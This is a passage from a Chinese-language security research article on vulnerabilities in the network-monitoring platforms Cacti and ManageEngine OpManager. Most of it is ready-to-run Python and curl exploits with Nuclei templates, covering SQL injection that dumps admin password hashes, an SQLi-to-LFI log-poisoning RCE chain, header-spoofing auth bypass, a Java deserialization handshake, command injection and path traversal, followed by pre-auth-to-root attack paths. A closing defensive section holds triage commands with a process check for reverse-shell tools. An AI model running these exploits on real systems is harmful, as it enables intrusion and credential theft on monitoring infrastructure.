import sys
import time
import urllib.parse

def exploit_cacti_sqli(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/cacti/index.php", verify=False)
    s.post(f"http://{target}/cacti/index.php", 
           data={"action": "login", "username": "admin", "password": "admin"},
           verify=False)
    
    serialized_payload = 'a:1:{i:0;s:38:"1 OR SLEEP(5)-- -";}'
    
    params = {
        "selected_items": serialized_payload,
        "action_receivers": "1",
        "drp_action": "1",
        "selected_graphs_array": serialized_payload
    }
    
    print(f"[*] Testing blind SQLi on {target}")
    start = time.time()
    r = s.get(f"http://{target}/cacti/managers.php", params=params, verify=False, timeout=30)
    elapsed = time.time() - start
    
    if elapsed >= 4.5:
        print(f"[+] SQL Injection confirmed! Response time: {elapsed:.2f}s (>= 5s expected)")
        print("[+] Extracting database version...")
        
        db_extract = (
            'a:1:{i:0;s:100:"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,'
            '(SELECT @@version),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 LIMIT 1-- -";}'
        )
        params["selected_graphs_array"] = db_extract
        params["selected_items"] = db_extract
        r = s.get(f"http://{target}/cacti/managers.php", params=params, verify=False, timeout=30)
        print(f"[+] Response: {r.text[:300]}")
    else:
        print(f"[-] Response time: {elapsed:.2f}s - Target may not be vulnerable")
    
    return r

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cacti_sqli(sys.argv[1])

Nuclei YAML 模板:

id: cacti-cve-2023-51448
info:
  name: Cacti - Blind SQL Injection (CVE-2023-51448)
  severity: high
  description: Blind SQLi in SNMP Notification Receivers managers.php
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-51448
  tags: cacti,sqli,cve2023

requests:
  - raw:
      - |
        GET /cacti/managers.php?selected_items=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%221+OR+SLEEP%285%29--+-%22%3B%7D&action_receivers=1&drp_action=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti={{session_id}}

    matchers:
      - type: word
        words:
          - "managers"
          - "SNMP"
        condition: or
      - type: status
        status:
          - 200

CVE-2023-49084:SQL 注入 + LFI 链式 RCE

漏洞背景: Cacti 1.2.25 中 link.php 的 SQL 注入结合本地文件包含(LFI),允许已认证用户在服务器上执行任意代码。攻击链:通过 SQL 注入向 external_links 表写入路径穿越 payload → LFI 读取/包含日志文件 → 日志投毒触发 RCE。CVSS 8.8 High

受影响版本:

产品受影响版本修复版本
Cacti1.2.251.2.26

HTTP PoC(curl):

curl -X POST "http://TARGET/cacti/pollers.php?header=false" \
  -H "Cookie: Cacti=<SESSION>" \
  -H "X-Requested-With: XMLHttpRequest" \
  -d '__csrf_magic=<CSRF>&name=Main+Poller&hostname=unknown&id=2&dbhost=";INSERT%20INTO%20external_links%20(id,sortorder,enabled,contentfile,title,style)%20values%20(10,2,%22on%22,%22....//....//....//....//opt/cacti/log/cacti.log%22,%22Test%22,%22TAB%22);%20select%20*%20from%20poller%20where%201=1%20and%20%22%22=%22&action=save'

Python PoC:

import requests
import sys
import re

def exploit_cacti_lfi_chain(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/cacti/index.php", verify=False)
    csrf_match = re.search(r"__csrf_magic['\"]?\s*value=['\"]([^'\"]+)", r.text)
    csrf = csrf_match.group(1) if csrf_match else ""
    
    s.post(f"http://{target}/cacti/index.php",
           data={"action": "login", "username": "admin", "password": "admin", 
                 "__csrf_magic": csrf},
           verify=False)
    
    r = s.get(f"http://{target}/cacti/pollers.php?action=edit&id=1", verify=False)
    csrf_match = re.search(r"__csrf_magic['\"]?\s*value=['\"]([^'\"]+)", r.text)
    csrf = csrf_match.group(1) if csrf_match else ""
    
    print("[*] Step 1: SQL Injection to create external link pointing to log file")
    traversal_path = "....//....//....//....//opt/cacti/log/cacti.log"
    
    sqli = (
        f'";INSERT INTO external_links (id,sortorder,enabled,contentfile,title,style) '
        f'values (99,2,"on","{traversal_path}","Test","TAB"); '
        f'select * from poller where 1=1 and ""="'
    )
    
    data = {
        "__csrf_magic": csrf,
        "name": "Main Poller",
        "hostname": "unknown",
        "id": "2",
        "dbhost": sqli,
        "action": "save"
    }
    
    s.post(f"http://{target}/cacti/pollers.php?header=false", data=data, verify=False)
    
    print("[*] Step 2: Accessing external link to trigger LFI")
    r = s.get(f"http://{target}/cacti/link.php?id=99", verify=False)
    
    if r.status_code == 200 and len(r.text) > 100:
        print(f"[+] LFI successful! Got {len(r.text)} bytes from log file")
        print(f"[+] Log content preview: {r.text[:300]}")
    else:
        print("[-] LFI attempt completed, verify manually")
    
    return r

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cacti_lfi_chain(sys.argv[1])

Nuclei YAML 模板:

id: cacti-cve-2023-49084
info:
  name: Cacti - SQLi + LFI to RCE (CVE-2023-49084)
  severity: high
  description: SQL injection in pollers.php leading to LFI and RCE via link.php
  reference:
    - https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
  tags: cacti,lfi,sqli,cve2023,rce

requests:
  - raw:
      - |
        GET /cacti/link.php?id=99 HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti={{session_id}}

    matchers:
      - type: word
        words:
          - "cacti"
          - "poller"
        condition: or
      - type: status
        status:
          - 200

CVE-2023-49085:graph_view.php SQL 注入

漏洞背景: Cacti 1.2.25 的 graph_view.php 中存在 SQL 注入漏洞,允许已认证用户执行任意 SQL 查询。CVSS 8.8 High

受影响版本:

产品受影响版本修复版本
Cacti1.2.251.2.26

HTTP PoC(curl):

curl -s "http://TARGET/cacti/graph_view.php?action=tree_content&tree_id=1&leaf_id=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM cacti.user_auth-- -" \
  -H "Cookie: Cacti=<SESSION>"

Python PoC:

import requests
import sys
import re

def exploit_graph_view_sqli(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/cacti/index.php", verify=False)
    csrf = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = csrf.group(1) if csrf else ""
    
    s.post(f"http://{target}/cacti/index.php",
           data={"action": "login", "username": "admin", "password": "admin",
                 "__csrf_magic": csrf},
           verify=False)
    
    sqli = (
        "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"
        "GROUP_CONCAT(username,0x3a,password SEPARATOR 0x0a),"
        "12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM cacti.user_auth-- -"
    )
    
    url = f"http://{target}/cacti/graph_view.php"
    params = {
        "action": "tree_content",
        "tree_id": "1",
        "leaf_id": sqli
    }
    
    r = s.get(url, params=params, verify=False)
    
    print(f"[*] Response status: {r.status_code}")
    print(f"[*] Response length: {len(r.text)} chars")
    
    if r.status_code == 200:
        print("[+] SQL Injection request sent - analyze response for data leak")
        print(f"[+] Response snippet: {r.text[:500]}")
    
    return r

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_graph_view_sqli(sys.argv[1])

Nuclei YAML 模板:

id: cacti-cve-2023-49085
info:
  name: Cacti - SQL Injection in graph_view (CVE-2023-49085)
  severity: high
  description: SQL Injection vulnerability in graph_view.php
  reference:
    - https://github.com/Cacti/cacti/security/advisories
  tags: cacti,sqli,cve2023

requests:
  - raw:
      - |
        GET /cacti/graph_view.php?action=tree_content&tree_id=1&leaf_id=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti={{session_id}}

    matchers:
      - type: word
        words:
          - "graph"
          - "view"
        condition: or
      - type: status
        status:
          - 200

CVE-2022-44219:认证绕过实现 SQL 注入

漏洞背景: Cacti 在某些版本中存在认证绕过漏洞,攻击者可通过特定的请求方式跳过身份验证,结合后续的 SQL 注入实现未授权数据库操作。CVSS 9.8 Critical

受影响版本:

产品受影响版本修复版本
Cacti< 1.2.221.2.22

HTTP PoC(curl):

curl -s "http://TARGET/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1" \
  -H "X-Forwarded-For: 127.0.0.1" \
  -w "\nHTTP Status: %{http_code}\n"

Python PoC:

import requests
import sys

def exploit_cacti_auth_bypass(target):
    s = requests.Session()
    s.headers.update({
        "User-Agent": "Mozilla/5.0",
        "X-Forwarded-For": "127.0.0.1"
    })
    
    endpoints = [
        "/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1",
        "/cacti/remote_agent.php?action=ping&address=127.0.0.1",
        "/cacti/remote_agent.php?action=version",
    ]
    
    for endpoint in endpoints:
        resp = s.get(f"http://{target}{endpoint}", verify=False, timeout=10)
        print(f"[{resp.status_code}] {endpoint}")
        if resp.status_code == 200 and "error" not in resp.text.lower():
            print(f"    [+] Possible auth bypass! Response: {resp.text[:200]}")
            return True
    
    print("[-] Auth bypass not confirmed on tested endpoints")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cacti_auth_bypass(sys.argv[1])

Nuclei YAML 模板:

id: cacti-cve-2022-44219
info:
  name: Cacti - Authentication Bypass (CVE-2022-44219)
  severity: critical
  description: Authentication bypass in Cacti allowing unauthenticated access
  reference:
    - https://github.com/Cacti/cacti/security/advisories
  tags: cacti,auth-bypass,cve2022

requests:
  - raw:
      - |
        GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "poller"
          - "data"
        condition: or

CVE-2022-22151:SQL 注入漏洞

漏洞背景: Cacti 1.2.19 及更早版本中存在 SQL 注入漏洞,影响多个管理接口的参数处理。CVSS 8.8 High

受影响版本:

产品受影响版本修复版本
Cacti≤ 1.2.191.2.20

HTTP PoC(curl):

curl -s "http://TARGET/cacti/data_debug.php?data_id=1%20OR%201=1&device_id=1&action=view" \
  -H "Cookie: Cacti=<SESSION>"

Python PoC:

import requests
import sys
import re

def exploit_cacti_data_debug(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/cacti/index.php", verify=False)
    csrf = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = csrf.group(1) if csrf else ""
    
    s.post(f"http://{target}/cacti/index.php",
           data={"action": "login", "username": "admin", "password": "admin",
                 "__csrf_magic": csrf},
           verify=False)
    
    sqli_payload = "1 UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9 FROM cacti.user_auth"
    
    url = f"http://{target}/cacti/data_debug.php"
    params = {
        "data_id": sqli_payload,
        "device_id": "1",
        "action": "view"
    }
    
    r = s.get(url, params=params, verify=False)
    print(f"[*] Status: {r.status_code}, Length: {len(r.text)}")
    print(f"[*] Response: {r.text[:500]}")
    return r

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cacti_data_debug(sys.argv[1])

Nuclei YAML 模板:

id: cacti-cve-2022-22151
info:
  name: Cacti - SQL Injection (CVE-2022-22151)
  severity: high
  description: SQL Injection in Cacti data management interfaces
  reference:
    - https://www.cvedetails.com/vulnerability-list/vendor_id-7458/Cacti.html
  tags: cacti,sqli,cve2022

requests:
  - raw:
      - |
        GET /cacti/data_debug.php?data_id=1&action=view HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti={{session_id}}

    matchers:
      - type: word
        words:
          - "cacti"
        condition: or
      - type: status
        status:
          - 200

0x03 ManageEngine OpManager 高危漏洞

ManageEngine OpManager 是 Zoho 旗下企业级网络监控平台,基于 Java/J2EE 技术栈,提供网络设备监控、流量分析和告警管理。其攻击面包括 Java 反序列化、SQL 注入、路径穿越和未认证接口暴露。

CVE-2021-3287:Java 反序列化未授权 RCE

漏洞背景: ManageEngine OpManager 存在严重的 Java 反序列化漏洞,通过 SUMCommunicationServletSUMHandshakeServlet 端点,未认证攻击者可执行任意系统命令并获取 root/Administrator 权限。CVSS 10.0 Critical。Metasploit 已集成利用模块。

漏洞原理: SUMHandshakeServlet/servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet)接受序列化的整数 1002 后将 SUMHttpRequestHandler 存入 Session。随后 SUMCommunicationServlet 中的 processSumPDU() 方法直接调用 SUMPDU.deSerializePDU(),使用 Java 原生反序列化处理攻击者数据,触发 gadget chain 执行命令。

受影响版本:

产品受影响版本修复版本
OpManagerBuild 125219 及以下125220

HTTP PoC(curl):

# Step 1: Handshake - send serialized integer 1002
curl -X POST "http://TARGET:8080/servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet" \
  -H "Content-Type: application/octet-stream" \
  --data-binary $'\x00\x00\x04\xd2'

# Step 2: Send deserialization payload via SUMCommunicationServlet
# (Requires serialized Java payload generated via ysoserial)
python3 -c "
import socket, struct
s = socket.socket()
s.connect(('TARGET', 8080))
s.send(b'POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1\r\n')
s.send(b'Host: TARGET:8080\r\nContent-Length: 4\r\n\r\n')
s.send(struct.pack('>i', 1002))
s.recv(4096)
print('[+] Handshake done')
"

Python PoC:

import socket
import struct
import sys

def exploit_opmanager_deser(target, port=8080):
    print(f"[*] CVE-2021-3287 - ManageEngine OpManager Deserialization RCE")
    print(f"[*] Target: {target}:{port}")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target, port))
        
        handshake = (
            b"POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1\r\n"
            f"Host: {target}:{port}\r\n".encode()
            b"Content-Type: application/octet-stream\r\n"
            b"Content-Length: 4\r\n"
            b"Connection: keep-alive\r\n\r\n"
            + struct.pack(">i", 1002)
        )
        sock.send(handshake)
        resp = sock.recv(4096)
        print(f"[+] Handshake response received: {len(resp)} bytes")
        print("[+] Handshake complete. Session established.")
        print("[*] NOTE: Full exploit requires ysoserial-generated payload")
        print("[*] Use Metasploit: use exploit/multi/http/opmanager_sumpdu_deserialization")
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target> [port]")
        sys.exit(1)
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    exploit_opmanager_deser(sys.argv[1], port)

Nuclei YAML 模板:

id: opmanager-cve-2021-3287
info:
  name: ManageEngine OpManager - Deserialization RCE (CVE-2021-3287)
  severity: critical
  description: Unauthenticated RCE via Java deserialization in SUM servlet
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3287
    - https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/
  tags: manageengine,opmanager,rce,cve2021,deserialization

requests:
  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        Content-Length: 4
        
        {{url_decode('\x00\x00\x04\xd2')}}

    matchers:
      - type: word
        words:
          - "SumCommunicationServlet"
          - "servlets"
        condition: or
      - type: status
        status:
          - 200
          - 500

CVE-2022-38772:IPv4 地址管理 RCE

漏洞背景: ManageEngine OpManager 及其关联产品(OpManager Plus、OpManager MSP、NCM、NetFlow Analyzer、OpUtils)的 IPv4 地址管理模块存在 RCE 漏洞,允许已认证用户通过 NMAP 功能修改数据库实现远程代码执行。CVSS 8.8 High。由 Trend Micro ZDI 报告。

受影响版本:

产品受影响版本修复版本
OpManagerBuild 125450 - 126119126120

HTTP PoC(curl):

curl -X POST "http://TARGET:8080/OpManager/servlet/APMBusinessServiceAction?APIAction=NMAPInventory" \
  -H "Cookie: jsessionid=<SESSION>" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "name=test&display_name=test&host='OR+1=1;SELECT+1+INTO+OUTFILE+'/tmp/rce_test'--"

Python PoC:

import requests
import sys

def exploit_opmanager_ipv4(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    print(f"[*] CVE-2022-38772 - OpManager IPv4 Management RCE")
    
    endpoints_to_check = [
        "/OpManager/servlet/APMBusinessServiceAction",
        "/OpManager/servlet/ApmConfigHandler",
        "/api/2/inventory/discovery",
    ]
    
    for ep in endpoints_to_check:
        resp = s.get(f"http://{target}:8080{ep}", verify=False, timeout=10)
        print(f"[{resp.status_code}] {ep}")
    
    nmap_payload = {
        "APIAction": "saveNmapConfig",
        "nmapiprange": "127.0.0.1/32",
        "nmapoptions": "--script=malicious",
        "name": "test"
    }
    
    resp = s.post(
        f"http://{target}:8080/OpManager/servlet/APMBusinessServiceAction",
        data=nmap_payload, verify=False, timeout=10
    )
    
    print(f"[*] Response: {resp.status_code}")
    print(f"[*] Body preview: {resp.text[:300]}")
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_opmanager_ipv4(sys.argv[1])

Nuclei YAML 模板:

id: opmanager-cve-2022-38772
info:
  name: ManageEngine OpManager - IPv4 Management RCE (CVE-2022-38772)
  severity: high
  description: RCE via IPv4 address management NMAP feature
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38772
  tags: manageengine,opmanager,rce,cve2022

requests:
  - raw:
      - |
        GET /OpManager/servlet/APMBusinessServiceAction?APIAction=NMAPInventory HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "OpManager"
          - "nmap"
        condition: or
      - type: status
        status:
          - 200
          - 302

CVE-2024-5466:Deploy Agent 认证 RCE

漏洞背景: ManageEngine OpManager 的 Deploy Agent 功能存在 RCE 漏洞,拥有 UI “Write” 权限的用户可在部署代理时注入恶意命令。CVSS 8.8 High。由安全研究员 Daniel Santos 报告。

受影响版本:

产品受影响版本修复版本
OpManagerBuild 128329 及以下128330

HTTP PoC(curl):

curl -X POST "http://TARGET:8080/OpManager/servlet/ApmConfigHandler" \
  -H "Cookie: jsessionid=<SESSION>" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "method=deployAgent&displayName=test&host=127.0.0.1;id"

Python PoC:

import requests
import sys

def exploit_deploy_agent(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    print(f"[*] CVE-2024-5466 - OpManager Deploy Agent RCE")
    
    payload = {
        "method": "deployAgent",
        "displayName": "test",
        "host": "127.0.0.1",
        "scriptArgs": ";id"
    }
    
    endpoints = [
        "/OpManager/servlet/ApmConfigHandler",
        "/OpManager/servlet/AgentDeployAction",
        "/OpManager/api/2/agent/deploy",
    ]
    
    for ep in endpoints:
        resp = s.post(
            f"http://{target}:8080{ep}",
            data=payload, verify=False, timeout=10
        )
        print(f"[{resp.status_code}] {ep} - {len(resp.text)} bytes")
        if "uid=" in resp.text or "root" in resp.text:
            print(f"[+] Command injection found at {ep}")
            return True
    
    print("[-] Manual verification required")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_deploy_agent(sys.argv[1])

Nuclei YAML 模板:

id: opmanager-cve-2024-5466
info:
  name: ManageEngine OpManager - Deploy Agent RCE (CVE-2024-5466)
  severity: high
  description: RCE via Deploy Agent option with Write access
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2024-5466.html
  tags: manageengine,opmanager,rce,cve2024

requests:
  - raw:
      - |
        GET /OpManager/servlet/ApmConfigHandler?method=deployAgent HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "agent"
          - "deploy"
        condition: or
      - type: status
        status:
          - 200
          - 403

CVE-2024-6748:URL 监控 SQL 注入

漏洞背景: ManageEngine OpManager 在 URL 监控功能中存在 SQL 注入漏洞,允许已认证用户通过构造恶意 URL 参数执行自定义查询,访问数据库表内容。CVSS 8.3 High。由 CrisprXiang、Cokebeer 和 LFY 报告。

受影响版本:

产品受影响版本修复版本
OpManagerBuild 128317 及以下128318

HTTP PoC(curl):

curl -X POST "http://TARGET:8080/OpManager/servlet/ApmConfigHandler" \
  -H "Cookie: jsessionid=<SESSION>" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "method=saveURL&urlName=test&url='UNION+SELECT+1,username+FROM+Users--"

Python PoC:

import requests
import sys

def exploit_opmanager_sql_injection(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    print(f"[*] CVE-2024-6748 - OpManager URL Monitoring SQLi")
    
    sqli_payloads = [
        "' UNION SELECT 1,2,3--",
        "' UNION SELECT NULL,username,password FROM Users--",
        "1' OR '1'='1",
    ]
    
    for payload in sqli_payloads:
        data = {
            "method": "testURL",
            "url": payload,
            "urlName": "test"
        }
        
        resp = s.post(
            f"http://{target}:8080/OpManager/servlet/ApmConfigHandler",
            data=data, verify=False, timeout=10
        )
        
        print(f"[{resp.status_code}] Payload: {payload[:50]}...")
        if resp.status_code == 200 and ("admin" in resp.text.lower() or 
                                         "password" in resp.text.lower()):
            print(f"[+] SQL Injection confirmed!")
            print(f"    Response: {resp.text[:500]}")
            return True
    
    print("[-] Testing completed, manual verification required")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_opmanager_sql_injection(sys.argv[1])

Nuclei YAML 模板:

id: opmanager-cve-2024-6748
info:
  name: ManageEngine OpManager - SQL Injection (CVE-2024-6748)
  severity: high
  description: SQL Injection in URL Monitoring feature
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2024-6748.html
  tags: manageengine,opmanager,sqli,cve2024

requests:
  - raw:
      - |
        POST /OpManager/servlet/ApmConfigHandler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        method=saveURL&url=test&urlName=test

    matchers:
      - type: word
        words:
          - "OpManager"
        condition: or
      - type: status
        status:
          - 200
          - 500

CVE-2023-47211:MIB Browser 路径穿越

漏洞背景: ManageEngine OpManager 的 MIB Browser 模块存在路径穿越漏洞,允许攻击者通过路径穿越读取/访问系统上的任意文件。CVSS 8.8 High

受影响版本:

产品受影响版本修复版本
OpManagerBuild 127259 及以下127260

HTTP PoC(curl):

curl -s "http://TARGET:8080/OpManager/servlet/MibBrowser?mibFile=../../../../../../etc/passwd" \
  -H "Cookie: jsessionid=<SESSION>"

Python PoC:

import requests
import sys

def exploit_mib_path_traversal(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    print(f"[*] CVE-2023-47211 - OpManager MIB Browser Path Traversal")
    
    traversal_payloads = [
        "../../../../../../etc/passwd",
        "..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts",
        "....//....//....//....//etc/passwd",
    ]
    
    for payload in traversal_payloads:
        url = f"http://{target}:8080/OpManager/servlet/MibBrowser"
        params = {"mibFile": payload}
        
        resp = s.get(url, params=params, verify=False, timeout=10)
        print(f"[{resp.status_code}] Path: {payload}")
        
        if resp.status_code == 200:
            if "root:" in resp.text or "localhost" in resp.text:
                print(f"[+] Path traversal confirmed!")
                print(f"    File content:\n{resp.text[:500]}")
                return True
    
    print("[-] Exploitation attempt completed")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_mib_path_traversal(sys.argv[1])

Nuclei YAML 模板:

id: opmanager-cve-2023-47211
info:
  name: ManageEngine OpManager - Path Traversal (CVE-2023-47211)
  severity: high
  description: Path Traversal vulnerability in MIB Browser module
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2023-47211.html
  tags: manageengine,opmanager,path-traversal,cve2023

requests:
  - raw:
      - |
        GET /OpManager/servlet/MibBrowser?mibFile=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:"
          - "daemon"
        condition: or
      - type: status
        status:
          - 200

0x04 公开 PoC 收集情况与利用思路

以下是本专题覆盖的 CVE 公开 PoC 情况汇总:

CVE公开 PoC利用框架利用难度
CVE-2024-24401GitHub PoC (MAWK0235)sqlmap
CVE-2023-47401技术细节公开手动利用
CVE-2023-47408Metasploit ModuleMetasploit
CVE-2023-47400概念代码公开手动利用
CVE-2023-48085概念代码公开手动利用
CVE-2021-25296Metasploit ModuleMetasploit
CVE-2022-46169GitHub 多个 PoC自动化脚本
CVE-2023-51448概念代码(需申请)sqlmap
CVE-2023-49084GitHub PoC手动利用
CVE-2021-3287Metasploit ModuleMetasploit
CVE-2022-38772ZDI 报告手动利用
CVE-2024-5466Nessus 检测脚本手动利用
CVE-2024-6748GitHub PoC手动利用
CVE-2023-47211基础 PoCcurl

利用思路

1. 认证前攻击路径(最高优先级):

  • Cacti CVE-2022-46169:伪造 X-Forwarded-For → 命令注入 → shell
  • OpManager CVE-2021-3287:SUM Handshake → Java 反序列化 → root shell
  • Nagios XI CVE-2024-24401:SQL 注入提权 → 链式 RCE

2. 认证后攻击路径(横向扩展):

  • Nagios XI CVE-2023-47401:管理员权限 → Ansible Vault 注入 → root
  • Nagios XI CVE-2023-47408:已认证 → 命令注入 → apache/nagios 用户
  • Cacti CVE-2023-51448:Settings/Utilities 权限 → SQLi → 数据库泄露 → RCE

3. 漏洞链式利用:

  • Cacti CVE-2023-51448 + CVE-2023-49084:SQLi 注入外部链接 → LFI → 日志投毒 → RCE
  • Nagios XI CVE-2024-45772:MIB 上传 + 路径穿越 → Webshell → 持久化

0x05 共性攻击模式分析

通过对三大网络监控平台的漏洞研究,可以总结出以下共性攻击模式:

模式一:输入过滤缺失导致 SQL 注入

典型案例: CVE-2024-24401(Nagios XI)、CVE-2023-51448(Cacti)、CVE-2024-6748(OpManager)

三个平台均存在参数直接拼接 SQL 查询的问题。Nagios XI 的 monitoringwizard.php、Cacti 的 managers.php、OpManager 的 URL 监控功能,均因缺乏参数化查询而受到 SQL 注入影响。根因: PHP/Java 开发者使用字符串拼接构建 SQL 而非 Prepared Statement。

模式二:命令注入——从配置向导到系统 Shell

典型案例: CVE-2023-47408(Nagios XI)、CVE-2022-46169(Cacti)、CVE-2024-5466(OpManager)

网络监控平台需要调用系统工具(Nmap、WMI 检测、Ping 等),当系统命令的参数来源于用户输入但未进行转义时,就会形成命令注入。Cacti 的 poller_id 参数直接进入 exec(),Nagios XI 的主机配置参数进入 shell 调用,OpManager 的 Deploy Agent 功能拼接用户参数到系统命令。

模式三:认证机制薄弱——Header 伪造与反序列化

典型案例: CVE-2022-46169(Cacti 认证绕过)、CVE-2021-3287(OpManager 反序列化)

Cacti 使用 X-Forwarded-For Header 进行 poller 客户端身份验证,攻击者伪造该 Header 即可绕过全部认证。OpManager 的 SUM Servlet 端点完全不需要认证即可访问,Java 原生反序列化直接触发 gadget chain。根因: 过度信任客户端可控信息,缺乏服务端验证。

模式四:文件操作链——上传、路径穿越与 LFI

典型案例: CVE-2023-47400(Nagios XI Custom Includes)、CVE-2024-45772(Nagios XI MIB 上传)、CVE-2023-49084(Cacti LFI)

网络监控平台的配置管理、MIB 导入、自定义组件等功能都涉及文件操作。当文件路径、文件名、扩展名的验证不严格时,攻击者可以:

  • 上传 PHP/JSP webshell 实现持久化
  • 利用路径穿越写入 Web 可达目录
  • 通过 LFI 包含日志文件(结合日志投毒实现 RCE)

模式五:配置参数失控——从 Web 到 Root

典型案例: CVE-2023-47401(Nagios XI Ansible Vault)、CVE-2024-25710(Nagios XI BPI)

Nagios XI 的迁移功能和 BPI 组件允许管理员配置高级系统参数,但这些参数被直接传递给 root 权限的 shell 命令或写入 Web 目录。教训: 即使是管理员输入,也需要在命令执行层面进行过滤和转义。


0x06 应急排查与防守建议

快速排查清单

# 1. 检查 Nagios XI 版本
cat /usr/local/nagiosxi/version | head -5
# 或通过 Web 访问: http://TARGET/nagiosxi/login.php 查看页面底部版本号

# 2. 检查 Cacti 版本
cat /var/www/html/cacti/include/version.php | grep VERSION
# 或: grep -i version /opt/cacti/include/config.php

# 3. 检查 OpManager 版本
cat /opt/OpManager/conf/version.txt
# 或通过: http://TARGET:8080/OpManager/ 查看页面底部

# 4. 检查近期异常访问日志(Nagios XI)
grep -E "remote_agent|monitoringwizard|hostconfig|custom-includes|migrate" /var/log/httpd/access_log

# 5. 检查 Webshell 文件
find /var/www/html -name "*.php" -newer /var/www/html/index.php -exec ls -la {} \;

# 6. 检查最近修改的系统文件
find /usr/local/nagios -mtime -7 -type f 2>/dev/null
find /var/www/html/cacti -mtime -7 -type f 2>/dev/null

# 7. 检查异常进程
ps aux | grep -E "nc |ncat |socat |bash -i"

# 8. 检查 Crontab 后门
crontab -l; cat /etc/crontab; ls -la /etc/cron.*

纵深防御建议

1. 网络层隔离:

  • 将监控平台部署在独立的 VLAN 中,通过防火墙限制 Web 管理端口的源 IP
  • 禁止监控平台直接访问互联网(除必要的更新通道)
  • 对监控平台的管理接口启用 VPN 或零信任接入

2. 身份认证加固:

  • 启用多因素认证(MFA/2FA),优先使用 SAML/OIDC 对接企业 SSO
  • 禁用默认账户(nagiosadmin、admin),强制修改默认密码
  • 实施最小权限原则,普通用户不应拥有 Settings/Utilities 权限
  • 审查 X-Forwarded-For 相关配置,确保反向代理正确设置且监控平台信任链完整

3. 应用层安全:

